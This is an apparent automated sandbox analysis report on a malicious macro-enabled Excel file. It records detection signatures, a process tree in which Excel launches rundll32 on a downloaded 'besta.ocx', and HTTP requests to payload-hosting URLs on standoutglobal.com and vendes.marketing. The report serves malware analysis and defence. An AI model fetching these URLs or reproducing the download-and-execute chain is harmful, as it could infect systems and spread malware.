Loading ...

Play interactive tourEdit tour

Windows Analysis Report SCAN_7295943480515097.xlsm

Overview

General Information

Sample Name:SCAN_7295943480515097.xlsm
Analysis ID:532474
MD5:1ab11dce30326f39f6186f9aa05d5777
SHA1:397dd88ca9d78a16ab549a8d22a711ddbea80c05
SHA256:8f8e07b2eaca8af62e86cebd2372f1b85d420091801ec472796387a44a98bbcd
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
JA3 SSL client fingerprint seen in connection with other malware
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5980 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 3928 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4348061343 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4348061343, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4348061343, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5980, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4348061343, ProcessId: 3928

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: SCAN_7295943480515097.xlsmVirustotal: Detection: 21%Perma Link
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknownHTTPS traffic detected: 107.180.46.229:443 -> 192.168.2.3:49807 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.3:49740 -> 162.240.9.126:80
    Source: global trafficDNS query: name: standoutglobal.com
    Source: global trafficTCP traffic: 192.168.2.3:49807 -> 107.180.46.229:443
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: vendes.marketing
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /transmigrant/Wplzr/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vendes.marketingConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: src="https://www.facebook.com/tr?id=408176514230511&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
    Source: EXCEL.EXE, 00000000.00000003.755751851.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576682242.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504342762.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765651167.000000000F8E2000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesv
    Source: EXCEL.EXE, 00000000.00000002.762957049.000000000DB3D000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
    Source: EXCEL.EXE, 00000000.00000002.762957049.000000000DB3D000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
    Source: EXCEL.EXE, 00000000.00000003.614273226.0000000015E8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.614245583.0000000015E5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619402149.00000000135C2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619328077.0000000015E7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.614226439.0000000015E2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619289255.0000000015E1F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619305847.0000000015E4F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
    Source: EXCEL.EXE, 00000000.00000003.614226439.0000000015E2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619289255.0000000015E1F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
    Source: EXCEL.EXE, 00000000.00000003.619402149.00000000135C2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
    Source: EXCEL.EXE, 00000000.00000003.614273226.0000000015E8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.614245583.0000000015E5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619328077.0000000015E7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619305847.0000000015E4F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
    Source: EXCEL.EXE, 00000000.00000002.768447111.0000000015B70000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.c
    Source: EXCEL.EXE, 00000000.00000002.768447111.0000000015B70000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.co
    Source: EXCEL.EXE, 00000000.00000002.768447111.0000000015B70000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.com%http://standoutglobal.com/2/MWpqeVgZ/
    Source: EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.com/
    Source: EXCEL.EXE, 00000000.00000002.766494588.0000000013308000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756540939.0000000013308000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496724357.00000000132DA000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679166159.0000000013307000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.com/2/MWpqeVgZ/
    Source: EXCEL.EXE, 00000000.00000003.496278619.000000001368F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497337079.000000001368F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504935052.000000001368F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.503708711.000000001368F000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: http://vendes.marketing/
    Source: EXCEL.EXE, 00000000.00000003.495992652.00000000135CC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.577118654.00000000135CC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.642811620.00000000135C2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.640771984.00000000135C2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619409024.00000000135C9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579556608.00000000135CC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.503248323.00000000135CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.754618432.00000000135BD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756257287.00000000135C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.644442503.00000000135C2000.00000004.00000001.sdmpString found in binary or memory: http://vendes.marketing/transmigrant/Wplzr/
    Source: EXCEL.EXE, 00000000.00000003.495992652.00000000135CC000.00000004.00000001.sdmpString found in binary or memory: http://vendes.marketing/transmigrant/Wplzr/B
    Source: EXCEL.EXE, 00000000.00000003.495992652.00000000135CC000.00000004.00000001.sdmpString found in binary or memory: http://vendes.marketing/transmigrant/Wplzr/N
    Source: EXCEL.EXE, 00000000.00000003.575598844.00000000135C9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.767205497.00000000135C9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.616428887.00000000135B7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.495992652.00000000135CC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.577118654.00000000135CC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.642811620.00000000135C2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.640771984.00000000135C2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619409024.00000000135C9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579556608.00000000135CC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.503248323.00000000135CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.754618432.00000000135BD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756257287.00000000135C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.644442503.00000000135C2000.00000004.00000001.sdmpString found in binary or memory: http://vendes.marketing/transmigrant/Wplzr/b
    Source: EXCEL.EXE, 00000000.00000003.504647326.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581482859.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579110952.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.577081581.0000000015CD6000.00000004.00000001.sdmpString found in binary or memory: http://vendes.marketinng/
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadAppInfoQuery15https://api.addins.omex.office
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: EXCEL.EXE, 00000000.00000003.503943037.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765237836.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.757836026.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576411439.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755273769.000000000F805000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled2
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticatedBearer
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeT
